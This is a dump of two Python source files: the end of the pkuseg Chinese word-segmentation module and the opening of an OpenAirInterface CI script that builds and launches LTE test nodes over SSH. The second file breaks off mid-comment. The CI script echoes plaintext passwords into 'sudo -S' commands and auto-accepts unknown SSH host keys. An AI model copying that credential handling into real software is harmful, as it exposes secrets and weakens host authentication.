self.other_words = set()
else:
self.other_words = set()
for other_name in other_names:
# with open(other_name, encoding='utf-8') as f:
# lines = f.readlines()
# self.other_words.update(set(map(lambda x:x.strip(), lines)))
with open(other_name, "rb") as f:
all_words = pkl.load(f).strip().split("\n")
self.other_words.update(set(all_words))
def post_process(self, sent, check_seperated):
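# Scan with window sizes m = 7 .. 2 and merge m consecutive tokens whenever their
# concatenation is a known dictionary word: always merge for common_words; for
# other_words only merge when the span is not already made up entirely of
# dictionary words (when check_seperated is set).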
for m in reversed(range(2, 8)):
end = len(sent)-m
if end < 0:
continue
i = 0
while (i < end + 1):
merged_words = ''.join(sent[i:i+m])
if merged_words in self.common_words:
do_seg = True
elif merged_words in self.other_words:
if check_seperated:
seperated = all(((w in self.common_words)
or (w in self.other_words)) for w in sent[i:i+m])
else:
seperated = False
if seperated:
do_seg = False
else:
do_seg = True
else:
do_seg = False
if do_seg:
for k in range(m):
del sent[i]
sent.insert(i, merged_words)
i += 1
end = len(sent) - m
else:
i += 1
return sent
def __call__(self, sent):
if not self.do_process:
return sent
return self.post_process(sent, check_seperated=True)
class pkuseg:
def __init__(self, model_name="default", user_dict="default", postag=False):
"""初始化函数,加载模型及用户词典"""
# print("loading model")
# config = Config()
# self.config = config
self.postag = postag
if model_name in ["default"]:
config.modelDir = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"models",
model_name,
)
elif model_name in config.available_models:
config.modelDir = os.path.join(
config.pkuseg_home,
model_name,
)
download_model(config.model_urls[model_name], config.pkuseg_home, config.model_hash[model_name])
else:
config.modelDir = model_name
# config.fModel = os.path.join(config.modelDir, "model.txt")
if user_dict is None:
file_name = None
other_names = None
else:
if user_dict not in config.available_models:
file_name = user_dict
else:
file_name = None
if model_name in config.models_with_dict:
other_name = os.path.join(
config.pkuseg_home,
model_name,
model_name+"_dict.pkl",
)
default_name = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"dicts", "default.pkl",
)
other_names = [other_name, default_name]
else:
default_name = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"dicts", "default.pkl",
)
other_names = [default_name]
self.preprocesser = Preprocesser(file_name)
# self.preprocesser = Preprocesser([])
self.postprocesser = Postprocesser(None, other_names)
self.feature_extractor = FeatureExtractor.load()
self.model = Model.load()
self.idx_to_tag = {
idx: tag for tag, idx in self.feature_extractor.tag_to_idx.items()
}
self.n_feature = len(self.feature_extractor.feature_to_idx)
self.n_tag = len(self.feature_extractor.tag_to_idx)
if postag:
download_model(config.model_urls["postag"], config.pkuseg_home, config.model_hash["postag"])
postag_dir = os.path.join(
config.pkuseg_home,
"postag",
)
self.tagger = Postag(postag_dir)
# print("finish")
def _cut(self, text):
"""
Segment the text directly.
"""
examples = list(self.feature_extractor.normalize_text(text))
length = len(examples)
all_feature = [] # type: List[List[int]]
for idx in range(length):
node_feature_idx = self.feature_extractor.get_node_features_idx(
idx, examples
)
# node_feature = self.feature_extractor.get_node_features(
# idx, examples
# )
# node_feature_idx = []
# for feature in node_feature:
# feature_idx = self.feature_extractor.feature_to_idx.get(feature)
# if feature_idx is not None:
# node_feature_idx.append(feature_idx)
# if not node_feature_idx:
# node_feature_idx.append(0)
all_feature.append(node_feature_idx)
_, tags = _inf.decodeViterbi_fast(all_feature, self.model)
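# Convert the per-character tags back into words: a tag whose name contains "B"
# starts a new word, any other tag extends the current word.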
words = []
current_word = None
is_start = True
for tag, char in zip(tags, text):
if is_start:
current_word = char
is_start = False
elif "B" in self.idx_to_tag[tag]:
words.append(current_word)
current_word = char
else:
current_word += char
if current_word:
words.append(current_word)
return words
def cut(self, txt):
"""分词,结果返回一个list"""
txt = txt.strip()
ret = []
if not txt:
return ret
imary = txt.split()  # split on whitespace into pieces
# segment each piece
for w0 in imary:
if not w0:
continue
# split further according to the user dictionary
lst, isword = self.preprocesser.solve(w0)
for w, isw in zip(lst, isword):
if isw:
ret.append(w)
continue
output = self._cut(w)
ret.extend(self.postprocesser(output))
if self.postag:
tags = self.tagger.tag(ret)
ret = list(zip(ret, tags))
return ret
def train(trainFile, testFile, savedir, train_iter=20, init_model=None):
"""用于训练模型"""
# config = Config()
starttime = time.time()
if not os.path.exists(trainFile):
raise Exception("trainfile does not exist.")
if not os.path.exists(testFile):
raise Exception("testfile does not exist.")
if not os.path.exists(config.tempFile):
os.makedirs(config.tempFile)
if not os.path.exists(config.tempFile + "/output"):
os.mkdir(config.tempFile + "/output")
# config.runMode = "train"
config.trainFile = trainFile
config.testFile = testFile
config.modelDir = savedir
# config.fModel = os.path.join(config.modelDir, "model.txt")
config.nThread = 1
config.ttlIter = train_iter
config.init_model = init_model
os.makedirs(config.modelDir, exist_ok=True)
trainer.train(config)
# pkuseg.main.run(config)
# clearDir(config.tempFile)
print("Total time: " + str(time.time() - starttime))
def _test_single_proc(
input_file, output_file, model_name="default", user_dict="default", postag=False, verbose=False
):
times = []
times.append(time.time())
seg = pkuseg(model_name, user_dict, postag=postag)
times.append(time.time())
if not os.path.exists(input_file):
raise Exception("input_file {} does not exist.".format(input_file))
with open(input_file, "r", encoding="utf-8") as f:
lines = f.readlines()
times.append(time.time())
results = []
for line in lines:
if not postag:
results.append(" ".join(seg.cut(line)))
else:
results.append(" ".join(map(lambda x:"/".join(x), seg.cut(line))))
times.append(time.time())
with open(output_file, "w", encoding="utf-8") as f:
f.write("\n".join(results))
times.append(time.time())
print("total_time:\t{:.3f}".format(times[-1] - times[0]))
if verbose:
time_strs = ["load_model", "read_file", "word_seg", "write_file"]
for key, value in zip(
time_strs,
[end - start for start, end in zip(times[:-1], times[1:])],
):
print("{}:\t{:.3f}".format(key, value))
def _proc_deprecated(seg, lines, start, end, q):
for i in range(start, end):
l = lines[i].strip()
ret = seg.cut(l)
q.put((i, " ".join(ret)))
def _proc(seg, in_queue, out_queue):
# TODO: load seg (json or pickle serialization) in sub_process
# to avoid pickle seg online when using start method other
# than fork
while True:
item = in_queue.get()
if item is None:
return
idx, line = item
if not seg.postag:
output_str = " ".join(seg.cut(line))
else:
output_str = " ".join(map(lambda x:"/".join(x), seg.cut(line)))
out_queue.put((idx, output_str))
def _proc_alt(model_name, user_dict, postag, in_queue, out_queue):
seg = pkuseg(model_name, user_dict, postag=postag)
while True:
item = in_queue.get()
if item is None:
return
idx, line = item
if not postag:
output_str = " ".join(seg.cut(line))
else:
output_str = " ".join(map(lambda x:"/".join(x), seg.cut(line)))
out_queue.put((idx, output_str))
def _test_multi_proc(
input_file,
output_file,
nthread,
model_name="default",
user_dict="default",
postag=False,
verbose=False,
):
alt = multiprocessing.get_start_method() == "spawn"
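# With the "spawn" start method the segmenter object cannot be inherited by the
# workers, so each worker loads its own model via _proc_alt; with "fork" a single
# shared segmenter is built here and passed to _proc.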
times = []
times.append(time.time())
if alt:
seg = None
else:
seg = pkuseg(model_name, user_dict, postag)
times.append(time.time())
if not os.path.exists(input_file):
raise Exception("input_file {} does not exist.".format(input_file))
with open(input_file, "r", encoding="utf-8") as f:
lines = f.readlines()
times.append(time.time())
in_queue = Queue()
out_queue = Queue()
procs = []
for _ in range(nthread):
if alt:
p = Process(
target=_proc_alt,
args=(model_name, user_dict, postag, in_queue, out_queue),
)
else:
p = Process(target=_proc, args=(seg, in_queue, out_queue))
procs.append(p)
for idx, line in enumerate(lines):
in_queue.put((idx, line))
for proc in procs:
in_queue.put(None)
proc.start()
times.append(time.time())
result = [None] * len(lines)
for _ in result:
idx, line = out_queue.get()
result[idx] = line
times.append(time.time())
for p in procs:
p.join()
times.append(time.time())
with open(output_file, "w", encoding="utf-8") as f:
f.write("\n".join(result))
times.append(time.time())
print("total_time:\t{:.3f}".format(times[-1] - times[0]))
if verbose:
time_strs = [
"load_model",
"read_file",
"start_proc",
"word_seg",
"join_proc",
"write_file",
]
if alt:
times = times[1:]
time_strs = time_strs[1:]
time_strs[2] = "load_modal & word_seg"
for key, value in zip(
time_strs,
[end - start for start, end in zip(times[:-1], times[1:])],
):
print("{}:\t{:.3f}".format(key, value))
def test(
input_file,
output_file,
model_name="default",
user_dict="default",
nthread=10,
postag=False,
verbose=False,
):
if nthread > 1:
_test_multi_proc(
input_file, output_file, nthread, model_name, user_dict, postag, verbose
)
else:
_test_single_proc(
input_file, output_file, model_name, user_dict, postag, verbose
)
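# A minimal usage sketch (illustrative only; the example sentence and the exact
# segmentation shown are assumptions):
#
#   import pkuseg
#   seg = pkuseg.pkuseg()                    # load the default model
#   print(seg.cut("我爱北京天安门"))          # e.g. ['我', '爱', '北京', '天安门']
#   pkuseg.test("input.txt", "output.txt", nthread=4)   # file-to-file segmentation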
|
main.py
|
#/*
# * Licensed to the OpenAirInterface (OAI) Software Alliance under one or more
# * contributor license agreements. See the NOTICE file distributed with
# * this work for additional information regarding copyright ownership.
# * The OpenAirInterface Software Alliance licenses this file to You under
# * the OAI Public License, Version 1.1 (the "License"); you may not use this file
# * except in compliance with the License.
# * You may obtain a copy of the License at
# *
# * http://www.openairinterface.org/?page_id=698
# *
# * Unless required by applicable law or agreed to in writing, software
# * distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
# *-------------------------------------------------------------------------------
# * For more information about the OpenAirInterface (OAI) Software Alliance:
# * contact@openairinterface.org
# */
#---------------------------------------------------------------------
# Python for CI of OAI-eNB + COTS-UE
#
# Required Python Version
# Python 3.x
#
# Required Python Package
# pexpect
#---------------------------------------------------------------------
#-----------------------------------------------------------
# Version
#-----------------------------------------------------------
Version = '0.1'
#-----------------------------------------------------------
# Constants
#-----------------------------------------------------------
ALL_PROCESSES_OK = 0
ENB_PROCESS_FAILED = -1
ENB_PROCESS_OK = +1
ENB_PROCESS_SEG_FAULT = -11
ENB_PROCESS_ASSERTION = -12
ENB_PROCESS_REALTIME_ISSUE = -13
ENB_PROCESS_NOLOGFILE_TO_ANALYZE = -14
HSS_PROCESS_FAILED = -2
HSS_PROCESS_OK = +2
MME_PROCESS_FAILED = -3
MME_PROCESS_OK = +3
SPGW_PROCESS_FAILED = -4
SPGW_PROCESS_OK = +4
UE_IP_ADDRESS_ISSUE = -5
#-----------------------------------------------------------
# Import
#-----------------------------------------------------------
import sys # arg
import re # reg
import pexpect # pexpect
import time # sleep
import os
import subprocess
import xml.etree.ElementTree as ET
import logging
import datetime
import signal
from multiprocessing import Process, Lock, SimpleQueue
logging.basicConfig(
level=logging.DEBUG,
format="[%(asctime)s] %(name)s:%(levelname)s: %(message)s"
)
#-----------------------------------------------------------
# Class Declaration
#-----------------------------------------------------------
class SSHConnection():
def __init__(self):
self.eNBIPAddress = ''
self.eNBRepository = ''
self.eNBBranch = ''
self.eNB_AllowMerge = False
self.eNBCommitID = ''
self.eNBTargetBranch = ''
self.eNBUserName = ''
self.eNBPassword = ''
self.eNBSourceCodePath = ''
self.EPCIPAddress = ''
self.EPCUserName = ''
self.EPCPassword = ''
self.EPCSourceCodePath = ''
self.EPCType = ''
self.ADBIPAddress = ''
self.ADBUserName = ''
self.ADBPassword = ''
self.testCase_id = ''
self.testXMLfiles = []
self.nbTestXMLfiles = 0
self.desc = ''
self.Build_eNB_args = ''
self.Initialize_eNB_args = ''
self.eNBLogFile = ''
self.eNB_instance = ''
self.eNBOptions = ''
self.rruOptions = ''
self.ping_args = ''
self.ping_packetloss_threshold = ''
self.iperf_args = ''
self.iperf_packetloss_threshold = ''
self.iperf_profile = ''
self.nbMaxUEtoAttach = -1
self.UEDevices = []
self.CatMDevices = []
self.UEIPAddresses = []
self.htmlFile = ''
self.htmlHeaderCreated = False
self.htmlFooterCreated = False
self.htmlUEConnected = -1
self.htmleNBFailureMsg = ''
self.picocom_closure = False
self.idle_sleep_time = 0
self.htmlTabRefs = []
self.htmlTabNames = []
self.htmlTabIcons = []
self.finalStatus = False
self.eNBOsVersion = ''
self.eNBKernelVersion = ''
self.eNBUhdVersion = ''
self.eNBUsrpBoard = ''
self.eNBCpuNb = ''
self.eNBCpuModel = ''
self.eNBCpuMHz = ''
def open(self, ipaddress, username, password):
count = 0
connect_status = False
while count < 4:
self.ssh = pexpect.spawn('ssh', [username + '@' + ipaddress], timeout = 5)
self.sshresponse = self.ssh.expect(['Are you sure you want to continue connecting (yes/no)?', 'password:', 'Last login', pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
self.ssh.sendline('yes')
self.ssh.expect('password:')
self.ssh.sendline(password)
self.sshresponse = self.ssh.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
count = 10
connect_status = True
else:
logging.debug('self.sshresponse = ' + str(self.sshresponse))
elif self.sshresponse == 1:
self.ssh.sendline(password)
self.sshresponse = self.ssh.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
count = 10
connect_status = True
else:
logging.debug('self.sshresponse = ' + str(self.sshresponse))
elif self.sshresponse == 2:
# Checking if we are really on the remote client defined by its IP address
self.command('stdbuf -o0 ifconfig | egrep --color=never "inet addr:"', '\$', 5)
result = re.search(str(ipaddress), str(self.ssh.before))
if result is None:
self.close()
else:
count = 10
connect_status = True
else:
# debug output
logging.debug(str(self.ssh.before))
logging.debug('self.sshresponse = ' + str(self.sshresponse))
# add a short delay before retrying on failure
if not connect_status:
time.sleep(1)
count += 1
if connect_status:
pass
else:
sys.exit('SSH Connection Failed')
def command(self, commandline, expectedline, timeout):
logging.debug(commandline)
self.ssh.timeout = timeout
self.ssh.sendline(commandline)
self.sshresponse = self.ssh.expect([expectedline, pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
return 0
elif self.sshresponse == 1:
logging.debug('\u001B[1;37;41m Unexpected EOF \u001B[0m')
logging.debug('Expected Line : ' + expectedline)
sys.exit(self.sshresponse)
elif self.sshresponse == 2:
logging.debug('\u001B[1;37;41m Unexpected TIMEOUT \u001B[0m')
logging.debug('Expected Line : ' + expectedline)
result = re.search('ping |iperf |picocom', str(commandline))
if result is None:
logging.debug(str(self.ssh.before))
sys.exit(self.sshresponse)
else:
return -1
else:
logging.debug('\u001B[1;37;41m Unexpected Others \u001B[0m')
logging.debug('Expected Line : ' + expectedline)
sys.exit(self.sshresponse)
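# Typical usage pattern, as seen throughout this file: send a command and wait
# up to `timeout` seconds for the shell prompt, e.g.
#   self.command('cd ' + self.eNBSourceCodePath, '\$', 5)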
def close(self):
self.ssh.timeout = 5
self.ssh.sendline('exit')
self.sshresponse = self.ssh.expect([pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
pass
elif self.sshresponse == 1:
if not self.picocom_closure:
logging.debug('\u001B[1;37;41m Unexpected TIMEOUT during closing\u001B[0m')
else:
logging.debug('\u001B[1;37;41m Unexpected Others during closing\u001B[0m')
def copyin(self, ipaddress, username, password, source, destination):
count = 0
copy_status = False
logging.debug('scp '+ username + '@' + ipaddress + ':' + source + ' ' + destination)
while count < 10:
scp_spawn = pexpect.spawn('scp '+ username + '@' + ipaddress + ':' + source + ' ' + destination, timeout = 100)
scp_response = scp_spawn.expect(['Are you sure you want to continue connecting (yes/no)?', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
scp_spawn.sendline('yes')
scp_spawn.expect('password:')
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
count = 10
copy_status = True
else:
logging.debug('1 - scp_response = ' + str(scp_response))
elif scp_response == 1:
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0 or scp_response == 3:
count = 10
copy_status = True
else:
logging.debug('2 - scp_response = ' + str(scp_response))
elif scp_response == 2:
count = 10
copy_status = True
else:
logging.debug('3 - scp_response = ' + str(scp_response))
# add a short delay before retrying on failure
if not copy_status:
time.sleep(1)
count += 1
if copy_status:
return 0
else:
return -1
def copyout(self, ipaddress, username, password, source, destination):
count = 0
copy_status = False
logging.debug('scp ' + source + ' ' + username + '@' + ipaddress + ':' + destination)
while count < 4:
scp_spawn = pexpect.spawn('scp ' + source + ' ' + username + '@' + ipaddress + ':' + destination, timeout = 100)
scp_response = scp_spawn.expect(['Are you sure you want to continue connecting (yes/no)?', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
scp_spawn.sendline('yes')
scp_spawn.expect('password:')
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
count = 10
copy_status = True
else:
logging.debug('1 - scp_response = ' + str(scp_response))
elif scp_response == 1:
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0 or scp_response == 3:
count = 10
copy_status = True
else:
logging.debug('2 - scp_response = ' + str(scp_response))
elif scp_response == 2:
count = 10
copy_status = True
else:
logging.debug('3 - scp_response = ' + str(scp_response))
# add a short delay before retrying on failure
if not copy_status:
time.sleep(1)
count += 1
if copy_status:
pass
else:
sys.exit('SCP failed')
def BuildeNB(self):
if self.eNBIPAddress == '' or self.eNBRepository == '' or self.eNBBranch == '' or self.eNBUserName == '' or self.eNBPassword == '' or self.eNBSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('mkdir -p ' + self.eNBSourceCodePath, '\$', 5)
self.command('cd ' + self.eNBSourceCodePath, '\$', 5)
self.command('if [ ! -e .git ]; then stdbuf -o0 git clone ' + self.eNBRepository + ' .; else stdbuf -o0 git fetch; fi', '\$', 600)
# Raphael: here add a check if git clone or git fetch went smoothly
self.command('git config user.email "jenkins@openairinterface.org"', '\$', 5)
self.command('git config user.name "OAI Jenkins"', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S git clean -x -d -ff', '\$', 30)
# if the commit ID is provided use it to point to it
if self.eNBCommitID != '':
self.command('git checkout -f ' + self.eNBCommitID, '\$', 5)
# if the branch is not develop, then it is a merge request and we need to do
# the potential merge. Note that merge conflicts should already have been checked earlier
if (self.eNB_AllowMerge):
if self.eNBTargetBranch == '':
if (self.eNBBranch != 'develop') and (self.eNBBranch != 'origin/develop'):
self.command('git merge --ff origin/develop -m "Temporary merge for CI"', '\$', 5)
else:
logging.debug('Merging with the target branch: ' + self.eNBTargetBranch)
self.command('git merge --ff origin/' + self.eNBTargetBranch + ' -m "Temporary merge for CI"', '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('mkdir -p log', '\$', 5)
self.command('chmod 777 log', '\$', 5)
# no need to clean the log directory (git clean already did that)
self.command('stdbuf -o0 ./build_oai ' + self.Build_eNB_args + ' 2>&1 | stdbuf -o0 tee -a compile_oai_enb.log', 'Bypassing the Tests', 600)
self.command('mkdir -p build_log_' + self.testCase_id, '\$', 5)
self.command('mv log/* ' + 'build_log_' + self.testCase_id, '\$', 5)
self.command('mv compile_oai_enb.log ' + 'build_log_' + self.testCase_id, '\$', 5)
# Workaround to run with develop-nr
self.command('if [ -e ran_build ]; then cp -rf ran_build lte_build_oai; fi', '\$', 30)
self.close()
self.CreateHtmlTestRow(self.Build_eNB_args, 'OK', ALL_PROCESSES_OK)
def InitializeHSS(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.EPCType == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
logging.debug('Using the OAI EPC HSS')
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./run_hss 2>&1 | stdbuf -o0 awk \'{ print strftime("[%Y/%m/%d %H:%M:%S] ",systime()) $0 }\' | stdbuf -o0 tee -a hss_' + self.testCase_id + '.log &', 'Core state: 2 -> 3', 35)
else:
logging.debug('Using the ltebox simulated HSS')
self.command('if [ -d ' + self.EPCSourceCodePath + '/scripts ]; then echo ' + self.eNBPassword + ' | sudo -S rm -Rf ' + self.EPCSourceCodePath + '/scripts ; fi', '\$', 5)
self.command('mkdir -p ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('cd /opt/hss_sim0609', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f hss.log daemon.log', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S echo "Starting sudo session" && sudo daemon --unsafe --name=simulated_hss --chdir=/opt/hss_sim0609 ./starthss_real ', '\$', 5)
self.close()
self.CreateHtmlTestRow(self.EPCType, 'OK', ALL_PROCESSES_OK)
def InitializeMME(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.EPCType == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('stdbuf -o0 hostname', '\$', 5)
result = re.search('hostname\\\\r\\\\n(?P<host_name>[a-zA-Z0-9\-\_]+)\\\\r\\\\n', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m Hostname Not Found! \u001B[0m')
sys.exit(1)
host_name = result.group('host_name')
self.command('echo ' + self.EPCPassword + ' | sudo -S ./run_mme 2>&1 | stdbuf -o0 tee -a mme_' + self.testCase_id + '.log &', 'MME app initialization complete', 100)
else:
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./start_mme', '\$', 5)
self.close()
self.CreateHtmlTestRow(self.EPCType, 'OK', ALL_PROCESSES_OK)
def InitializeSPGW(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.EPCType == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./run_spgw 2>&1 | stdbuf -o0 tee -a spgw_' + self.testCase_id + '.log &', 'Initializing SPGW-APP task interface: DONE', 30)
else:
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./start_xGw', '\$', 5)
self.close()
self.CreateHtmlTestRow(self.EPCType, 'OK', ALL_PROCESSES_OK)
def InitializeeNB(self):
if self.eNBIPAddress == '' or self.eNBUserName == '' or self.eNBPassword == '' or self.eNBSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
initialize_eNB_flag = True
pStatus = self.CheckProcessExist(initialize_eNB_flag)
if (pStatus < 0):
self.CreateHtmlTestRow(self.Initialize_eNB_args, 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
# If the tracer option is on, run tshark on the EPC side to capture traffic between the EPC and the eNB
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('ip addr show | awk -f /tmp/active_net_interfaces.awk | egrep -v "lo|tun"', '\$', 5)
result = re.search('interfaceToUse=(?P<eth_interface>[a-zA-Z0-9\-\_]+)done', str(self.ssh.before))
if result is not None:
eth_interface = result.group('eth_interface')
logging.debug('\u001B[1m Launching tshark on interface ' + eth_interface + '\u001B[0m')
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f /tmp/enb_' + self.testCase_id + '_s1log.pcap', '\$', 5)
self.command('echo $USER; nohup sudo tshark -f "host ' + self.eNBIPAddress +'" -i ' + eth_interface + ' -w /tmp/enb_' + self.testCase_id + '_s1log.pcap > /tmp/tshark.log 2>&1 &', self.EPCUserName, 5)
self.close()
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath, '\$', 5)
# Initialize_eNB_args usually starts with -O followed by the config file location in the repository
full_config_file = self.Initialize_eNB_args.replace('-O ','')
extra_options = ''
extIdx = full_config_file.find('.conf')
if (extIdx > 0):
extra_options = full_config_file[extIdx + 5:]
# if the tracer option is on, compile and run the T Tracer
result = re.search('T_stdout', str(extra_options))
if result is not None:
logging.debug('\u001B[1m Compiling and launching T Tracer\u001B[0m')
self.command('cd common/utils/T/tracer', '\$', 5)
self.command('make', '\$', 10)
self.command('echo $USER; nohup ./record -d ../T_messages.txt -o ' + self.eNBSourceCodePath + '/cmake_targets/enb_' + self.testCase_id + '_record.raw -ON -off VCD -off HEAVY -off LEGACY_GROUP_TRACE -off LEGACY_GROUP_DEBUG > ' + self.eNBSourceCodePath + '/cmake_targets/enb_' + self.testCase_id + '_record.log 2>&1 &', self.eNBUserName, 5)
self.command('cd ' + self.eNBSourceCodePath, '\$', 5)
full_config_file = full_config_file[:extIdx + 5]
config_path, config_file = os.path.split(full_config_file)
else:
sys.exit('Insufficient Parameter')
ci_full_config_file = config_path + '/ci-' + config_file
rruCheck = False
result = re.search('rru', str(config_file))
if result is not None:
rruCheck = True
# do not reset board twice in IF4.5 case
result = re.search('rru|enb', str(config_file))
if result is not None:
self.command('echo ' + self.eNBPassword + ' | sudo -S uhd_find_devices', '\$', 5)
result = re.search('type: b200', str(self.ssh.before))
if result is not None:
logging.debug('Found a B2xx device --> resetting it')
self.command('echo ' + self.eNBPassword + ' | sudo -S sudo b2xx_fx3_utils --reset-device', '\$', 5)
# Reloading FPGA bin firmware
self.command('echo ' + self.eNBPassword + ' | sudo -S uhd_find_devices', '\$', 5)
# Make a copy and adapt to EPC / eNB IP addresses
self.command('cp ' + full_config_file + ' ' + ci_full_config_file, '\$', 5)
self.command('sed -i -e \'s/CI_MME_IP_ADDR/' + self.EPCIPAddress + '/\' ' + ci_full_config_file, '\$', 2);
self.command('sed -i -e \'s/CI_ENB_IP_ADDR/' + self.eNBIPAddress + '/\' ' + ci_full_config_file, '\$', 2);
# Launch eNB with the modified config file
self.command('source oaienv', '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('echo "ulimit -c unlimited && ./lte_build_oai/build/lte-softmodem -O ' + self.eNBSourceCodePath + '/' + ci_full_config_file + extra_options + '" > ./my-lte-softmodem-run' + str(self.eNB_instance) + '.sh ', '\$', 5)
self.command('chmod 775 ./my-lte-softmodem-run' + str(self.eNB_instance) + '.sh ', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S rm -Rf enb_' + self.testCase_id + '.log', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S -E daemon --inherit --unsafe --name=enb' + str(self.eNB_instance) + '_daemon --chdir=' + self.eNBSourceCodePath + '/cmake_targets -o ' + self.eNBSourceCodePath + '/cmake_targets/enb_' + self.testCase_id + '.log ./my-lte-softmodem-run' + str(self.eNB_instance) + '.sh', '\$', 5)
if not rruCheck:
self.eNBLogFile = 'enb_' + self.testCase_id + '.log'
if extra_options != '':
self.eNBOptions = extra_options
time.sleep(6)
doLoop = True
loopCounter = 10
while (doLoop):
loopCounter = loopCounter - 1
if (loopCounter == 0):
# In case of T tracer recording, we may need to kill it
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.command('killall --signal SIGKILL record', '\$', 5)
self.close()
doLoop = False
logging.error('\u001B[1;37;41m eNB logging system did not show "got sync"! \u001B[0m')
self.CreateHtmlTestRow('-O ' + config_file + extra_options, 'KO', ALL_PROCESSES_OK)
self.CreateHtmlTabFooter(False)
# In case of T tracer recording, we need to kill tshark on EPC side
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
logging.debug('\u001B[1m Stopping tshark \u001B[0m')
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL tshark', '\$', 5)
self.close()
time.sleep(1)
pcap_log_file = 'enb_' + self.testCase_id + '_s1log.pcap'
copyin_res = self.copyin(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, '/tmp/' + pcap_log_file, '.')
if (copyin_res == 0):
self.copyout(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, pcap_log_file, self.eNBSourceCodePath + '/cmake_targets/.')
sys.exit(1)
else:
self.command('stdbuf -o0 cat enb_' + self.testCase_id + '.log | egrep --text --color=never -i "wait|sync"', '\$', 4)
if rruCheck:
result = re.search('wait RUs', str(self.ssh.before))
else:
result = re.search('got sync', str(self.ssh.before))
if result is None:
time.sleep(6)
else:
doLoop = False
if rruCheck and extra_options != '':
self.rruOptions = extra_options
self.CreateHtmlTestRow('-O ' + config_file + extra_options, 'OK', ALL_PROCESSES_OK)
logging.debug('\u001B[1m Initialize eNB Completed\u001B[0m')
self.close()
def InitializeUE_common(self, device_id):
logging.debug('send adb commands')
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# The following commands are deprecated since we no longer work on Android 7+
# self.command('stdbuf -o0 adb -s ' + device_id + ' shell settings put global airplane_mode_on 1', '\$', 10)
# self.command('stdbuf -o0 adb -s ' + device_id + ' shell am broadcast -a android.intent.action.AIRPLANE_MODE --ez state true', '\$', 60)
# a dedicated script has to be installed inside the UE
# airplane mode on means call /data/local/tmp/off
